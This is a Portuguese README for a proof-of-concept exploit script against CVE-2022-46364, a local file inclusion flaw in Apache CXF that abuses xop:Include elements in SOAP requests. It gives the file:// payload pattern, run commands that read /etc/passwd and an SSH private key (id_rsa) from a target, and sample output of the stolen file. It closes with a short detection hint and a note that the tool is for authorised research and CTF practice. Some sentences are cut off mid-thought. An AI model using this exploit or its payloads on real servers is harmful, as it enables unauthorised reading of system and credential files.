
Prova de conceito de exploit para CVE-2022-46364, uma vulnerabilidade de inclusão local de arquivos no Apache CXF por meio de elementos XOP Include manipulados em requisições SOAP, permitindo leitura arbitrária de arquivos.
Este repositório contém uma Prova de Conceito (PoC) de exploração para CVE-2022-46364, uma vulnerabilidade de Inclusão de Arquivo Local (LFI) no Apache CXF.
A vulnerabilidade surge devido ao tratamento inadequado de elementos XOP (XML-binary Optimized Packaging) Include em requisições SOAP, permitindo que atacantes leiam arquivos arbitrários do servidor.
O Apache CXF processa inadequadamente elementos <xop:Include> dentro de requisições SOAP.
Ao fornecer um href malicioso (ex.: file:///etc/passwd), o servidor pode incluir e retornar o conteúdo de arquivos locais.
Sempre verifique a versão exata vulnerável no seu ambiente alvo.
<xop:Include href="file:///path/to/file">.
├── cxf_lfi.sh # Script de exploração
├── README.md # Documentação
├── LICENSE # Licença MIT
└── .gitignore
chmod +x cxf_lfi.sh
Atualize o alvo dentro do script:
TARGET="http://<TARGET_IP>:8080/employeeservice"
./cxf_lfi.sh file:///etc/passwd
./cxf_lfi.sh file:///etc/passwd
./cxf_lfi.sh file:///home/user/.ssh/id_rsa
[+] Target: http://10.10.10.10:8080/employeeservice
[+] File: file:///etc/passwd
[+] Extracted Content:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
Alguns servidores podem:
file://A análise da saída depende do formato da resposta e pode exigir inspeção manual.
Monitore requisições SOAP incomuns contendo:
<xop:Include>file://Este projeto destina-se a:
Não use esta ferramenta em sistemas sem permissão explícita.
Desenvolvido como parte de pesquisa em segurança e prática de CTF.